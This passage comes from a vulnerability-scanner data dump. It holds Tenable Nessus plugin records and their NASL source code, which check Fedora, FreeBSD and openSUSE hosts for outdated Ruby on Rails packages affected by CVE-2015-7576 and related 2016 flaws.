audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionpack-4.2.0-3.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-activemodel-4.2.0-2.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack / rubygem-activemodel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T16:31:34", "description": "Ruby on Rails blog :\n\nRails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been released! These contain important security fixes, and it is recommended that users upgrade as soon as possible.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-03T00:00:00", "type": "nessus", "title": "FreeBSD : rails -- multiple vulnerabilities (bb0ef21d-0e1b-461b-bc3d-9cba39948888)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionpack", "p-cpe:/a:freebsd:freebsd:rubygem-actionpack4", "p-cpe:/a:freebsd:freebsd:rubygem-actionview", "p-cpe:/a:freebsd:freebsd:rubygem-activemodel4", "p-cpe:/a:freebsd:freebsd:rubygem-activerecord", "p-cpe:/a:freebsd:freebsd:rubygem-activerecord4", "p-cpe:/a:freebsd:freebsd:rubygem-rails", "p-cpe:/a:freebsd:freebsd:rubygem-rails-html-sanitizer", "p-cpe:/a:freebsd:freebsd:rubygem-rails4", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_BB0EF21D0E1B461BBC3D9CBA39948888.NASL", "href": "https://www.tenable.com/plugins/nessus/88532", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88532);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2015-7581\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\",\n \"CVE-2016-0753\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"FreeBSD : rails -- multiple vulnerabilities (bb0ef21d-0e1b-461b-bc3d-9cba39948888)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ruby on Rails blog :\n\nRails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been\nreleased! These contain important security fixes, and it is\nrecommended that users upgrade as soon as possible.\");\n # https://groups.google.com/forum/#!msg/rubyonrails-security/ANv0HDHEC3k/mt7wNGxbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16d62ba2\");\n # https://groups.google.com/d/msg/rubyonrails-security/cawsWcQ6c8g/tegZtYdbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42de9ca4\");\n # https://groups.google.com/forum/#!msg/rubyonrails-security/dthJ5wL69JE/YzPnFelbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2da12a39\");\n # https://groups.google.com/d/msg/rubyonrails-security/9oLY_FCzvoc/w9oI9XxbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fcd6bd9\");\n # https://groups.google.com/d/msg/rubyonrails-security/335P1DcLG00/OfB9_LhbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c9373e0\");\n # https://groups.google.com/d/msg/rubyonrails-security/6jQVC1geukQ/8oYETcxbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2dafa51e\");\n # https://weblog.rubyonrails.org/2016/1/25/Rails-5-0-0-beta1-1-4-2-5-1-4-1-14-1-3-2-22-1-and-rails-html-sanitizer-1-0-3-have-been-released/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dab5e79\");\n # https://vuxml.freebsd.org/freebsd/bb0ef21d-0e1b-461b-bc3d-9cba39948888.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?820d8995\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activemodel4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activerecord4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails-html-sanitizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack<3.2.22.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack4<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activemodel4<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activerecord<3.2.22.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activerecord4<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails<3.2.22.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails-html-sanitizer<1.0.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails4<4.2.5.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:32:52", "description": "This update for rubygem-actionpack-4_2, rubygem-actionview-4_2, rubygem-activemodel-4_2, rubygem-activerecord-4_2, rubygem-activesupport-4_2 fixes the following issues :\n\n - CVE-2015-7576: Timing attack vulnerability in basic authentication in Action Controller (boo#963329)\n\n - CVE-2016-0752: directory traversal and information leak in Action View (boo#963332)\n\n - CVE-2015-7581: unbounded memory growth DoS via wildcard controller routes (boo#963335)\n\n - CVE-2016-0751: rubygem-actionpack: Object Leak DoS (boo#963331)\n\n - CVE-2016-0753: Input Validation Circumvention (boo#963334)\n\n - CVE-2015-7577: Nested attributes rejection proc bypass (boo#963330)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-4_2 / rubygem-actionview-4_2 / rubygem-activemodel-4_2 / etc (openSUSE-2016-159)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-doc-4_2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-159.NASL", "href": "https://www.tenable.com/plugins/nessus/88612", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-159.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88612);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2015-7581\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\",\n \"CVE-2016-0753\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionpack-4_2 / rubygem-actionview-4_2 / rubygem-activemodel-4_2 / etc (openSUSE-2016-159)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for rubygem-actionpack-4_2, rubygem-actionview-4_2,\nrubygem-activemodel-4_2, rubygem-activerecord-4_2,\nrubygem-activesupport-4_2 fixes the following issues :\n\n - CVE-2015-7576: Timing attack vulnerability in basic\n authentication in Action Controller (boo#963329)\n\n - CVE-2016-0752: directory traversal and information leak\n in Action View (boo#963332)\n\n - CVE-2015-7581: unbounded memory growth DoS via wildcard\n controller routes (boo#963335)\n\n - CVE-2016-0751: rubygem-actionpack: Object Leak DoS\n (boo#963331)\n\n - CVE-2016-0753: Input Validation Circumvention\n (boo#963334)\n\n - CVE-2015-7577: Nested attributes rejection proc bypass\n (boo#963330)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963329\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963332\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963334\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963335\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionpack-4_2 / rubygem-actionview-4_2 / rubygem-activemodel-4_2 / etc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionpack-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionpack-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activemodel-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activemodel-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activerecord-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activerecord-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activesupport-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activesupport-doc-4_2-4.2.4-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1-rubygem-actionpack-4_2 / ruby2.1-rubygem-actionpack-doc-4_2 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-01T14:22:02", "description": "Security fix for CVE-2015-7581 Security fix for CVE-2016-0751 Security fix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionpack-4.2.3-4.fc23 (2016-f486068393)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F486068393.NASL", "href": "https://www.tenable.com/plugins/nessus/89640", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-f486068393.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89640);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2015-7581\", \"CVE-2016-0751\");\n script_xref(name:\"FEDORA\", value:\"2016-f486068393\");\n\n script_name(english:\"Fedora 23 : rubygem-actionpack-4.2.3-4.fc23 (2016-f486068393)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7581 Security fix for CVE-2016-0751 Security\nfix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178067.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4d4f755e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionpack package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionpack-4.2.3-4.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T16:30:43", "description": "Multiple security issues have been discovered in the Ruby on Rails web application development framework, which may result in denial of service, cross-site scripting, information disclosure or bypass of input validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-01T00:00:00", "type": "nessus", "title": "Debian DSA-3464-1 : rails - security update", "bulletinFamily": "scanner", "cvss2": {"severity": 